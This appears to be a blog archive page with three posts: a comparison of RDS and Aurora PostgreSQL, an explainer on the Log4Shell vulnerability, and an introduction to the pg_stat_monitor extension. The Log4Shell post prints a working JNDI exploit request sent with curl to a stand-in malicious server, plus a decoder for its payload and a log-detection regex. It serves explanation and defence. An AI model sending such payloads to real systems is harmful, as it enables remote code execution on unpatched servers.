
Wednesday, December 14, 2022

Differences between RDS PostgreSQL and Aurora PostgreSQL


1. Storage Differences

RDS PostgreSQL

RDS PostgreSQL uses Amazon Elastic Block Store (EBS). All data and logs are managed in the EBS volume attached to the instance. An EBS volume is confined to a single Availability Zone and cannot be shared by multiple EC2 instances.

RDS PostgreSQL storage can grow up to 64 TB.

RDS PostgreSQL storage automatically scales up in increments of 5 GB.

Amazon Aurora PostgreSQL

Aurora uses distributed storage that keeps six copies of the data spread across three Availability Zones.

Aurora PostgreSQL storage can grow up to 128 TB.

Aurora PostgreSQL storage automatically scales up in chunks of 10 GB.

2. Replica Differences

RDS PostgreSQL –

RDS uses PostgreSQL's native asynchronous streaming replication between the primary instance and its read replicas.

A maximum of 5 read replicas can be added to an RDS PostgreSQL instance.

Because replication is asynchronous, replicas lag behind the primary. The lag is typically a few seconds but can sometimes reach 30 seconds.

RDS supports cross-region read replicas.

 Aurora PostgreSQL

Aurora shares the storage tier between the primary and its read replicas: every replica in an Aurora cluster reads from the same storage volume. Aurora therefore does not depend on streaming replication; all replication happens at the storage tier, which is extremely efficient and places virtually no load on the compute resources.

Aurora supports up to 15 read replicas.

Replication lag is in milliseconds.

Aurora's shared-storage replication is same-region only, because all read replicas share a storage tier that spans multiple Availability Zones within a single region.

3. DR Strategies, High Availability, and Failover

From a disaster recovery perspective, cross-region replication is an important capability, and as noted above, RDS PostgreSQL supports cross-region read replicas.

Aurora does not support conventional cross-region read replicas, but DR strategies can be implemented by way of Aurora Global Database.

For high availability, RDS PostgreSQL can be set up in Multi-AZ mode. A setup with one primary instance and one standby instance across two AZs is referred to as a Multi-AZ instance deployment.

In case of a failure, RDS automatically fails over to the standby instance; this failover can also be a planned one. In this setup the standby instance cannot serve read traffic.

If there is more than one standby instance in the Multi-AZ setup, it is referred to as a Multi-AZ cluster deployment. If the primary instance fails, or a manual failover is requested, RDS promotes one of the standby instances to become the new primary. In this setup the standby instances can serve read traffic.

RDS PostgreSQL –

RDS supports failover by way of a Multi-AZ instance or cluster deployment.

Failover typically takes 60-120 seconds.

RDS uses synchronous replication between primary and standby instances.

 Aurora PostgreSQL

Aurora supports failover by promoting a read replica.

Failover typically takes under 30 seconds.

Aurora relies on the storage tier shared between instances to meet the replication requirement, so no separate standby replication stream is needed.

4. Backups

Both RDS and Aurora PostgreSQL carry out automated backups and they also allow for manual backups. The differences are in the frequency of backups and how the backups are created.

RDS PostgreSQL –

RDS PostgreSQL takes a daily backup during a backup window that is controlled by the user.

There is a slight performance impact during the backup.

In a Multi-AZ deployment, backups are taken from the standby instance.

Point-in-time recovery is slower than with Aurora PostgreSQL.

Aurora PostgreSQL

Aurora PostgreSQL carries out continuous incremental backups.

No performance impact during backup.

Backups are carried out at the storage tier.

Point-in-time recovery is faster than with RDS PostgreSQL.


Tuesday, December 14, 2021

What is the Log4Shell Vulnerability and How to Remediate It

The Log4j vulnerability, also referred to as Log4Shell (CVE-2021-44228), can be exploited to take complete control of the target and run arbitrary code.

This affects Log4j versions 2.0-beta9 through 2.14.1. The advisory at the time of writing is to update to the fixed release 2.15.0 or greater (subsequent advisories recommended 2.17.0 or later, as the initial fix was found to be incomplete).

The Exploit

The most simplistic example:

curl https://target.domain.tld -H 'X-Api-Version: ${jndi:ldap://malicious_server/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' -o/dev/null -v

When executed, this runs touch /tmp/pwned on the target system.
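As a sanity check, the Base64 payload at the end of the JNDI string can be decoded locally to reveal the injected command:

```python
import base64

# Base64 payload from the example exploit string above.
payload = "dG91Y2ggL3RtcC9wd25lZAo="

# Decoding reveals the shell command the attacker wants executed.
command = base64.b64decode(payload).decode().strip()
print(command)  # touch /tmp/pwned
```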

There are many such examples being tracked at the time of writing, which seek to either exploit the issue or at least confirm its presence.
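As a rough first-pass detection measure, access logs can be scanned for JNDI lookup strings. The sketch below matches only the canonical form; real exploit attempts often use nested or obfuscated lookups (e.g. ${${lower:j}ndi:...}) that a naive pattern will miss, so treat this as triage, not remediation:

```python
import re

# Naive pattern for the canonical exploit form; obfuscated variants
# require normalization before matching.
JNDI_PATTERN = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE
)

def suspicious_lines(log_lines):
    """Return log lines containing a canonical JNDI lookup string."""
    return [line for line in log_lines if JNDI_PATTERN.search(line)]

logs = [
    "GET / HTTP/1.1 X-Api-Version: ${jndi:ldap://malicious_server/a}",
    "GET /health HTTP/1.1 200 OK",
]
hits = suspicious_lines(logs)
print(hits)  # only the first line matches
```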

Step by Step: How to troubleshoot a slow-running query in PostgreSQL

Understanding query performance patterns is essentially the foundation of query performance tuning. In many ways, it dictates how a database cluster evolves. And then there are obviously direct and indirect cost implications as well.

PostgreSQL provides very detailed statistics through a number of catalog views and extensions that can be easily added to provide more detailed query statistics. With each view focused on a particular aspect, the picture almost always needs to be stitched together by combining different datasets. That requires effort and still, the whole picture might not be complete.

The pg_stat_monitor extension attempts to provide a more holistic picture by providing much-needed query performance insights in a single view. The extension has been evolving over the past year and is now nearing the GA release.

Some Useful Extensions

Currently, you may be relying on a number of extensions to understand how a query behaves, the time taken in planning and execution phases, min/max/meantime values, index hits, query plan, and client application details. Here are some extensions that you might already be very familiar with.

pg_stat_activity

This view is available by default with PostgreSQL. It provides one row per server process along with current activity and query text.

In case you'd like to learn more about it, hop over to the official PostgreSQL documentation.

pg_stat_statements

This extension is part of the contrib packages provided with the PostgreSQL server. However, you’d have to create the extension manually. It’s a query-wise aggregation of statistical data with min/max/mean/standard deviation for execution and planning times and various useful information and query text.

You can read more about pg_stat_statements at the official PostgreSQL documentation site.
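To make the min/max/mean/standard deviation aggregation concrete, here is a small Python sketch of the kind of running per-query statistics pg_stat_statements maintains. This is illustrative only, not the extension's actual C implementation; it uses a Welford-style online update so that no per-call history needs to be stored:

```python
import math

class QueryStats:
    """Running aggregates for one query, in the spirit of pg_stat_statements."""

    def __init__(self):
        self.calls = 0
        self.min_time = math.inf
        self.max_time = -math.inf
        self.mean_time = 0.0
        self._sum_var = 0.0  # sum of squared deviations (Welford's algorithm)

    def record(self, exec_ms):
        """Fold one execution time (in ms) into the aggregates."""
        self.calls += 1
        self.min_time = min(self.min_time, exec_ms)
        self.max_time = max(self.max_time, exec_ms)
        delta = exec_ms - self.mean_time
        self.mean_time += delta / self.calls
        self._sum_var += delta * (exec_ms - self.mean_time)

    @property
    def stddev_time(self):
        return math.sqrt(self._sum_var / self.calls) if self.calls else 0.0

stats = QueryStats()
for t in [10.0, 20.0, 30.0]:
    stats.record(t)
print(stats.calls, stats.min_time, stats.max_time, stats.mean_time)
```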

auto_explain

Another useful extension provided with the PostgreSQL server. It dumps query plans in the server log for any query exceeding a time threshold specified by a GUC (Grand Unified Configuration) parameter.

You can find more about auto_explain in the official PostgreSQL documentation.

pg_stat_monitor

Whilst all the previously mentioned views/extensions are great in their own right, one needs to manually combine client/connection information from pg_stat_activity, statistical data from pg_stat_statements, and query plans from auto_explain to complete the dataset needed to understand query performance patterns.

And that’s precisely the pain that pg_stat_monitor alleviates.

The feature set has been growing over the past year, and it now provides, in a single view, all the performance-related information you may need to debug a poorly performing query.

Feature Set

Some features that were part of earlier releases have already been discussed on this blog; however, for completeness, I'm going to cover them here as well.

  • Time Interval Grouping: Instead of supplying one set of ever-increasing counts, pg_stat_monitor computes stats for a configured number of time intervals; time buckets. This allows for much better data accuracy, especially in the case of high resolution or unreliable networks.
  • Multi-Dimensional Grouping:  While pg_stat_statements groups counters by (userid, dbid, queryid),  pg_stat_monitor uses a more detailed group for higher precision:
    • Bucket ID (bucket),
    • User ID (userid),
    • Database ID (dbid),
    • Query ID (queryid),
    • Client IP Address (client_ip),
    • Plan ID (planid),
    • Application Name (application_name).

This allows you to drill down into the performance of queries coming from particular client addresses and applications, which we at Percona have found to be very valuable in a number of cases.
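Conceptually, this grouping can be sketched as a counter keyed by the time bucket plus the dimensions above. All sample data below is hypothetical, and this is not pg_stat_monitor's actual implementation:

```python
from collections import Counter

BUCKET_SECONDS = 60  # hypothetical bucket width

def bucket_id(ts):
    """Map a Unix timestamp to a time-interval bucket."""
    return int(ts // BUCKET_SECONDS)

calls = Counter()

# Hypothetical executions: (timestamp, userid, dbid, queryid, client_ip, app)
samples = [
    (1000, 10, 1, 0xBEEF, "10.0.0.5", "billing"),
    (1010, 10, 1, 0xBEEF, "10.0.0.5", "billing"),
    (1100, 10, 1, 0xBEEF, "10.0.0.9", "reports"),
]
for ts, userid, dbid, queryid, ip, app in samples:
    calls[(bucket_id(ts), userid, dbid, queryid, ip, app)] += 1

# The same query is now split by bucket, client address, and application.
for key, n in sorted(calls.items()):
    print(key, n)
```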

  • Capture Actual Parameters in the Queries: pg_stat_monitor allows you to choose if you want to see queries with placeholders for parameters or actual query examples.
  • Query Plan: Each SQL statement is now accompanied by the actual plan that was constructed for its execution. We also found that having query parameter values is very helpful: you can run EXPLAIN on the query, easily modify it to make it run better, and communicate about it more clearly when discussing it with other DBAs and application developers.
  • Tables Access Statistics for a Statement: This allows us to easily identify all queries that accessed a given table. This set is on par with the information provided by pg_stat_statements.
  • Histogram: Visual representation is very helpful when it can help identify issues. With the help of the histogram function, you can now view a timing/calling data histogram in response to a SQL query. And yes, it even works in psql.
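The idea behind a timing histogram can be sketched in a few lines of Python (illustrative only; pg_stat_monitor's histogram() function works over the data the extension itself collects):

```python
def timing_histogram(times_ms, edges):
    """Count executions falling into each [low, high) timing range."""
    counts = [0] * (len(edges) - 1)
    for t in times_ms:
        for i in range(len(edges) - 1):
            if edges[i] <= t < edges[i + 1]:
                counts[i] += 1
                break
    return counts

edges = [0, 1, 10, 100, 1000]        # range boundaries in ms
times = [0.4, 2.5, 3.1, 42.0, 250.0]  # hypothetical execution times
counts = timing_histogram(times, edges)
for (lo, hi), n in zip(zip(edges, edges[1:]), counts):
    print(f"{lo:>4}-{hi:<4} ms | {'#' * n}")
```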

  • Functions: It may come as a surprise, but functions may internally execute statements! To ease tracking and analysis, pg_stat_monitor provides a column that keeps track of the top-level query for a statement so that you can backtrack to the originating function.
  • Relation Names: Relations used in a query are available in the “relations” column in the pg_stat_monitor view. This reduces work at your end and makes analysis simpler and quicker.
  • Query Types: With query classification as SELECT, INSERT, UPDATE, or DELETE, analysis becomes simpler. It's another effort reduced at your end, and another simplification by pg_stat_monitor.

  • Query Metadata: Google's Sqlcommenter is a useful tool that bridges the gap between ORM libraries and understanding database performance, and we support it. You can now put any key-value data in comments using the /* … */ syntax in your SQL statements (see the Sqlcommenter documentation for details), and the information will be parsed by pg_stat_monitor and made available in the comments column of the pg_stat_monitor view.

  • Logging Errors and Warnings: Most monitoring/statistics collector tools track only successful queries, but in many cases monitoring ERROR, WARNING, and LOG messages gives meaningful information for debugging an issue. pg_stat_monitor not only monitors ERROR/WARNING/LOG queries but also collects statistics about them. In PostgreSQL, queries that end in an ERROR or WARNING carry an error level (elevel), a SQL code (sqlcode), and an error message; pg_stat_monitor collects all of this information along with its aggregates.

We’ve Come a Long Way

What started as a concept is now nearing its final approach. The pg_stat_monitor extension has evolved and has become very feature-rich. We have no doubt about its usefulness for DBAs, performance engineers, application developers, and anyone who needs to look at query performance. We believe it can help save many hours and help identify unexpected query behaviors. 

pg_stat_monitor is available on GitHub. We are releasing it to get feedback from the community on what we're doing right and what we should do differently before we release pg_stat_monitor as a generally available version to be supported for years to come.